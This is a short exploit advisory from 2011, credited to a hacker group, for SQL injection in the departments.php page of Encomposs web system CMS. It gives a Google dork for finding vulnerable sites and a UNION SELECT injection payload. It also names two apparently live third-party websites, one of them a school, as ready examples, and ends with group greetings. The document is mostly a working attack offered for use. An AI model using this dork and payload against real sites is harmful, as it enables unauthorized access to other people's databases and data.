~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                        [Details & Title]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[~] title  : Encomposs web system CMS sql injection vulnerability
[~] Author : H3X
[~] Credit : Sepehr Security Team
[~] Date   : 2011-03-25
[~] Vulnerable Page : departments.php
[~] Google Dork : inurl:departments.php?id=
[~] Affected Software :Encomposs web system CMS & [http://www.encompasswebsystems.com]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                            [Exploit]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+]Exploit:

http://www.[sitename].com/departments.php?id=[Sql_injection]

Note: usually same as :http://www.[sitename].com/departments.php?id=[ID]+union+select+1,version()--

[+]Example:

1)http://www.ccacougars.net/departments.php?id=39+union+select+1,version%28%29--
2)http://school.wbcs.org/departments.php?id=39+union+select+1,version%28%29--

and more...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             [Greetz]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[*]Greetz:thE_Knight - Einestin - W!Z4RD - Naboodgar 
   C0NS74NTINE & all Sepehr Security Teams members
[*]our site: http://www.sepehr-team.org 
 
  ********* Ya?as?n türkl?r *********

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                         
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~